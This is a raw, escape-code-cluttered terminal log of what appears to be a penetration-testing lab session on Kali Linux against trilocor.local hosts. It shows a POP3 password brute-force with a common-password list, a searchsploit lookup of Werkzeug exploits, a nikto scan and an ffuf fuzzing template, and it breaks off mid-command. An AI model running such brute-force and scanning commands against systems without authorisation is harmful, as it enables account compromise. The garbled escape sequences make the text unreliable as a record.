#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m
pop3://10.129.197.143#[94De@trilocor.local -P#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m
pop3://10.129.197.143#[94D
#[J#[A#[25C
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m960#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:56:12]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mudo apt-get install --yes
filezilla#[39m#[35D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mudo apt-get install --yes
filezilla#[39m#[K#[103C[8:56:12]#[0m#[147D##[1m#[31ms#[1m#[31me#[0m#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[34D#[90marchsploit cassiopeia#[39m#[21D
#[J#[0;1;2mcommand#[0m
#[0msearchsploit seclists sed see
select select-default-ispell select-default-iwrap
select-default-wordlist select-editor semver sendemail
sendEmail sendmsrpc sense2john
sensible-browser sensible-editor sensible-pager sensible-terminal
sensors sensors-conf-convert sensors-detect
sensortag sepdebugcrcfix seq serve_image
service servicemenuinstaller sessreg
set setarch setcap setcifsacl
setfacl setfattr setfont
setkeycodes setleds setlogcons setmetamode
se-toolkit setoolkit setopt
setpci setpriv setsid setterm
setupcon setvesablank setvtrgb
#[Jsetxkbmap #[J
#[9A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mse#[0m#[39m#[90marchsploit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[146D###[1m#[31ms#[1m#[31me#[1m#[31ma#[0m#[39
m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msea#[0m#[39m#[90mrchsploit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[145D##[1m#[31ma#[1m#[31mr#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msear#[0m#[39m#[90mchsploit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[144D##[1m#[31mr#[1m#[31mc#[0m#[39m##[1m#[31m
c#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearch#[0m#[39m#[90msploit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[142D##[1m#[31mh#[1m#[31ms#[0m#[39m##[1m#[31m
s#[1m#[31mp#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsp#[0m#[39m#[90mloit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[140D##[1m#[31mp#[1m#[31ml#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchspl#[0m#[39m#[90moit
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[139D##[1m#[31ml#[1m#[31mo#[0m#[39m##[1m#[31m
o#[1m#[31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsploi#[0m#[39m#[90mt
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[137D##[1m#[31mi#[1m#[31mt#[0m#[39m#[12D#[0m#
[32ms#[0m#[32me#[0m#[32ma#[0m#[32mr#[0m#[32mc#[0m#[32mh#[0m#[32ms#[0m#[32mp#[0m#[32
ml#[0m#[32mo#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m#[90m
cassiopeia#[39m#[K#[116C[8:56:12]#[0m#[136D##[32mt#[32m #[39m
#[J#[A#[19C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[01;32mcomptotestdb.txt#[0m* #[Jjoomlascan.py #[J#[01;32mLICENSE#[0m*
#[J#[01;32mREADME.md#[0m* #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m
#[90mcassiopeia#[39m#[K#[116C[8:56:12]#[0m#[135D#[39mw#[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[9D#[90merkzeug#[39m#######
#[J#[A#[27C
#[J#]2;searchsploit
werkzeug##]1;searchsploit#---------------------------------------------------------
----------------------------------------------------------------
---------------------------------
Exploit Title
| Path
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Pallets #[01;31m#[KWerkzeug#[m#[K 0.15.4 - Path Traversal
| python/webapps/50101.py
#[01;31m#[KWerkzeug#[m#[K - 'Debug Shell' Command Execution
| multiple/remote/43905.py
#[01;31m#[KWerkzeug#[m#[K - Debug Shell Command Execution (Metasploit)
| python/remote/37814.rb
-----------------------------------------------------------------------------------
-------------------------------------- ---------------------------------
Shellcodes: No Results
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/Tools/JoomlaScan-master##]1;..laScan-master##]7;file:///home/kali/
Tools/JoomlaScan-master#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/JoomlaScan-
master#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m961#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:56:37]#[148D#[?1h#=#[?
2004hc##[4mc#[24m##[4mc#[24m#[90mat
/usr/share/exploitdb/exploits/php/webapps/11236.txt#[39m#[54D#[30m#[104m#[39m#[49m#
[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[4mc#[24m#[90mat
/usr/share/exploitdb/exploits/php/webapps/11236.txt#[39m#[K#[84C[8:56:37]#[0m#[147D
##[4mc#[39m#[4md#[24m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[53D###[24m#[32mc#[24m#[32md#[39m#[90m ../Tools/JoomlaScan-master#[39m#[27D
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m ../Tools/JoomlaScan-
master#[39m#[K#[110C[8:56:37]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mnamed directory#[0m
#[J#[0mautocomplete #[Jautocomplete-log #[Jzsh-
autocomplete#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~#[24m#[90m/Tools#[39m#[K#[129C[8:56:37]#[0m#[144D##[4m~#[39m#[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m2024-05-02-ZAP-Report-#[0m/ #[J#[01;34m2024-05-02-ZAP-Report-2#[0m/
#[J#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[J#[01;34mCPTS#[0m/ #[J#[01;34mCTF#[0m/
#[J#[01;34mDesktop#[0m/ #[J#[01;34mDownloads#[0m/ #[J#[01;34mSQLiteStudio#[0m/
#[J#[01;34mTools#[0m/ #[J#[01;34m 模板#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/#[24m#[90mTools#[39m#[K#[129C[8:56:37]#[0m#[143D##[4m/#[39m#[4mC#[24m#[39m
#[39m #[39m #[39m #####[90mPTS/TerminalLogs#[39m#[16D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/ #[J#[01;34mCTF#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/C#[24m#[90mPTS/TerminalLogs#[39m#[K#[117C[8:56:37]#[0m#[142D##[4mC#[39m#[4mP#
[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CP#[24m#[90mTS/TerminalLogs#[39m#[K#[117C[8:56:37]#[0m#[141D##[4mP#[39m#[4mT#
[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CPT#[24m#[90mS/TerminalLogs#[39m#[K#[117C[8:56:37]#[0m#[140D##[4mT#[39m#[4mS#
[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CPTS#[24m#[90m/TerminalLogs#[39m#[K#[117C[8:56:37]#[0m#[139D##[4mS#[39m#[4m/
#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/
#[J#[01;34mTerminalLogs#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CPTS/#[24m#[90mTerminalLogs#[39m#[K#[117C[8:56:37]#[0m#[138D##[4m/
#[39m#[4mN#[24m#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[11D#[90mIX01#[39m####
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CPTS/N#[24m#[90mIX01#[39m#[K#[124C[8:56:37]#[0m#[137D##[4mN#[39m#[4mI#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m
#[4m~/CPTS/NI#[24m#[90mX01#[39m#[K#[124C[8:56:37]#[0m#[136D##[4mI#[39m#[4mX#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m~/CPTS/NIX#[24m#[90m01#[39m#[K#[124C[8:56:37]#[0m#[135D
#[J#[A#[19C#[39m0#[39m1####[4mX#[4m0#[4m1#[1m#[4m/#[0m#[24m
#[J#[A#[21C
#[J#]2;cd ~/CPTS/NIX01##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m962#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:59:14]#[148D#[?1h#=#[?
2004hn##[1m#[31mn#[0m#[39m##[1m#[31mn#[0m#[39m#[90mikto -host
blog.trilocor.local#[39m#[30D##[1m#[31mn#[1m#[31ma#[0m#[39m#[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[29D#[90mno
user_list.txt#[39m#[16D
#[0;1;2mcommand#[0m
#[J#[0mnamei #[Jnameif #[Jnanddump #[Jnandflipbits #[Jnandtest
#[Jnandwrite #[Jnano #[Jnanoid #[Jnasm #[Jnawk
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mna#[0m#[39m#[90mno
user_list.txt#[39m#[K#[121C[8:59:14]#[0m#[146D###[1m#[31mn#[1m#[31ma#[1m#[31mn#[0m#
[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mnanddump #[Jnandflipbits #[Jnandtest #[Jnandwrite #[Jnano
#[Jnanoid #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mnan#[0m#[39m#[90mo
user_list.txt#[39m#[K#[121C[8:59:14]#[0m#[145D##[1m#[31mn#[1m#[31mo#[0m#[39m#####[0
m#[32mn#[0m#[32ma#[0m#[32mn#[0m#[32mo#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mnano #[Jnanoid#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mnano#[39m#[90m
user_list.txt#[39m#[K#[121C[8:59:14]#[0m#[144D###[32mn#[39m#[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[15D####[1m#[31mn#[1m#[31ma#[1m#[31mn#[0m#[39m#[90mo user_list.txt#[39m#[15D
#[J#[0;1;2mcommand#[0m
#[J#[0mnanddump #[Jnandflipbits #[Jnandtest #[Jnandwrite #[Jnano
#[Jnanoid #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mnan#[0m#[39m#[90mo
user_list.txt#[39m#[K#[121C[8:59:14]#[0m#[145D####[1m#[31mn#[1m#[31ma#[0m#[39m#[0m#
[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[16D#[90mno user_list.txt#[39m#[16D
#[J#[0;1;2mcommand#[0m
#[J#[0mnamei #[Jnameif #[Jnanddump #[Jnandflipbits #[Jnandtest
#[Jnandwrite #[Jnano #[Jnanoid #[Jnasm #[Jnawk
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mna#[0m#[39m#[90mno
user_list.txt#[39m#[K#[121C[8:59:14]#[0m#[146D###[1m#[31mn#[0m#[39m#[0m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[17D##[1m#[31mn#[0m#[39m#[90mikto -host
blog.trilocor.local#[39m#[30D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#
[39m#[49m
#[J#[0;1;2mcommand#[0m
#[0mnamei nameif nanddump nandflipbits nandwrite nano
nanoid nasm nawk
nbackup nbtscan nc ncrack nc.traditional ncurses6-
config ncursesw6-config ndisasm neo2john
neofetch neqn net netaddr netcat
netdiscover netkey-tool netkit-rcp netkit-rlogin
netkit-rsh netmask netsed net-server netsniff-ng net-snmp-
create-v3-user networkctl NetworkManager newgrp
newusers nfnl_osf nfsconf nfsiostat nfsstat nft
nftldump nftl_format nisdomainname
nl nm nmap nm-applet nmbd nm-
connection-editor nm-online nmtui nmtui-connect
nmtui-edit nmtui-hostname node-coveralls node-gyp nodejs nohup
nokogiri nologin nop
normalizer not-14 not-15 not-16 notify-send notus-
scanner notus-scan-start npa-tool nping
npm npm-arborist nproc npx nroff nsenter
nslookup nstat nsupdate
ntfs-3g ntfs-3g.probe ntfsclone ntfscluster ntfscmp
ntfsdecrypt ntfsfallocate ntfsfix ntfsinfo
ntfslabel ntfsls ntfsmove ntfsrecover ntfsresize
ntfssecaudit ntfstruncate ntfsundelete ntfswipe
ntlm2 ntlm_brute ntpd ntpkeygen ntpleapfetch ntpq
ntptrace ntpwait numba
numfmt nvlc nvramtool nyc
#[J#[30m#[104m(MORE)#[39m#[49m#[15A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mn#[0m#[39m#[90mikto -host
blog.trilocor.local#[39m#[K#[108C[8:59:14]#[0m#[147D##[0m#[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[31D
#[J#[0;1;2mcommand#[0m
#[0mg++-13 galera_recovery gapplication gatttool gawk
gawkbug gbak gc
gcc-ar-13 gcc-nm gcov-dump-13 gcov-tool-13 gcr-viewer
gdebi-gtk gdialog gdisk
gdk-pixbuf-csource genccode gendesc gendict
generic_chunked generic_send_tcp genmkvpwd genpng
getcifsacl get-iab getpcaps getty gftodvi
gids-tool gm gnome-disks
gnome-text-editor gopherd gpg gpg-wks-server gpg-zip
gpic gpp-decrypt gpre
gprof gprofng groupadd groupdel grub-glue-
efi grub-install grub-kbdcomp grub-mkfont
grub-mkimage grub-probe grub-render-label gs gslj
gslp gsnd gspath
gtf gtk4-broadwayd gtk4-builder-tool gtscompare gtstemplate
guymager gvmd gvm-manage-certs
gvpack gvpr gwenview_importer gxl2dot gxl2gv
gyp
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[32mg#[39m#[90mithub repo clone
drego85/JoomlaScan#[39m#[K#[103C[8:59:14]#[0m#[147D##[32mg#[32me#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[34D###[1m#[31mg#[1m#[31me#[0m#[39m#[90mdit
request.txt#[39m#[15D
#[J#[0;1;2mcommand#[0m
#[0mgedit geli2john gem gem3.1
genbrk gencat genccode gencfu
gencmn gencnval gendesc gendict
gendiff generic_chunked generic_listen_tcp generic_send_tcp
generic_send_udp generic_web_server_fuzz generic_web_server_fuzz2 genhtml
geninfo genl genmkvpwd gennorm2
genpat GenPat genpng genrb
gensprep geod geqn GET
getcap getcifsacl getconf get-edid
getent getfacl getfattr get-iab
getkeycodes getln getmapdl getopt
getopts get-oui getpcaps gettext
#[Jgettextize #[Jgettext.sh #[Jgetty #[J
#[8A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mge#[0m#[39m#[90mdit
request.txt#[39m#[K#[122C[8:59:14]#[0m#[146D###[1m#[31mg#[1m#[31me#[1m#[31md#[0m#[3
9m
#[J#[0;1;2mcommand#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mged#[0m#[39m#[90mit
request.txt#[39m#[K#[122C[8:59:14]#[0m#[145D##[1m#[31md#[1m#[31mi#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mgedi#[0m#[39m#[90mt
request.txt#[39m#[K#[122C[8:59:14]#[0m#[144D##[1m#[31mi#[1m#[31mt#[0m#[39m######[0m
#[32mg#[0m#[32me#[0m#[32md#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mgedit#[39m#[90m request.txt#[39m#[K#[122C[8:59:14]#[0m#[143D##[32mt#[32m
#[39m
#[J#[A#[12C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mgedit#[39m
#[90mrequest.txt#[39m#[K#[122C[8:59:14]#[0m#[142D#[39mr#[39me#[39mq#[39mu#[39me#[39
ms#[39mt#[39m.#[39mt#[39mx#[39mt#[11D#[4mr#[4me#[4mq#[4mu#[4me#[4ms#[4mt#[4m.#[4mt#
[4mx#[4mt#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mrequest.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mgedit#[39m #[4mrequest.txt#[24m#[K#[122C[8:59:14]#[0m#[131D#[?1l#>#[?2004l
#[J#[A#[23C
#[J#]2;gedit request.txt##]1;gedit##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m963#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:59:19]#[148D#[?1h#=#[?
2004hf#ffuf -request <request.txt> -request-proto http -w <wordlist> -fr
<error_message>#[81D#[7mf#[7mf#[7mu#[7mf#[7m #[7m-
#[7mr#[7me#[7mq#[7mu#[7me#[7ms#[7mt#[7m
#[7m<#[7mr#[7me#[7mq#[7mu#[7me#[7ms#[7mt#[7m.#[7mt#[7mx#[7mt#[7m>#[7m #[7m-
#[7mr#[7me#[7mq#[7mu#[7me#[7ms#[7mt#[7m-#[7mp#[7mr#[7mo#[7mt#[7mo#[7m
#[7mh#[7mt#[7mt#[7mp#[7m #[7m-#[7mw#[7m
#[7m<#[7mw#[7mo#[7mr#[7md#[7ml#[7mi#[7ms#[7mt#[7m>#[7m #[7m-#[7mf#[7mr#[7m
#[7m<#[7me#[7mr#[7mr#[7mo#[7mr#[7m_#[7mm#[7me#[7ms#[7ms#[7ma#[7mg#[7me#[7m>#[7m
#[27m#[82D#[27mf#[27mf#[27mu#[27mf#[27m #[27m-
#[27mr#[27me#[27mq#[27mu#[27me#[27ms#[27mt#[27m
#[27m<#[27mr#[27me#[27mq#[27mu#[27me#[27ms#[27mt#[27m.#[27mt#[27mx#[27mt#[27m>#[27m
#[27m-#[27mr#[27me#[27mq#[27mu#[27me#[27ms#[27mt#[27m-
#[27mp#[27mr#[27mo#[27mt#[27mo#[27m #[27mh#[27mt#[27mt#[27mp#[27m #[27m-#[27mw#[27m
#[27m<#[27mw#[27mo#[27mr#[27md#[27ml#[27mi#[27ms#[27mt#[27m>#[27m #[27m-
#[27mf#[27mr#[27m
#[27m<#[27me#[27mr#[27mr#[27mo#[27mr#[27m_#[27mm#[27me#[27ms#[27ms#[27ma#[27mg#[27m
e#[27m>#[27m
#[82D#[32mf#[32mf#[32mu#[32mf#[39m#[10C#[33m<#[39m#[4mr#[4me#[4mq#[4mu#[4me#[4ms#[4
mt#[4m.#[4mt#[4mx#[4mt#[24m#[33m>#[39m#[24C#[33m<#[39m#[8C#[33m>#[39m#[5C#[33m<#[39
m#[13C#[33m>#[39m#[1C
#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[66D#
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[67D#[8D##########
#[J#[0;1;2mfile#[0m
#[J#[0mmain_wordlist.txt #[Juser_list.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[85D#[4C#[6C#[8C
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[67D#[8D##########
#[J#[0;1;2mfile#[0m
#[J#[0mmain_wordlist.txt #[Juser_list.txt #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[85D##
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[33m<#[39mwordlist#[33m>#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[87D#[9D -fr
#[33m<#[39mer#[39mror_me#[39mssage#[33m>#[39m #[39m #[29D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
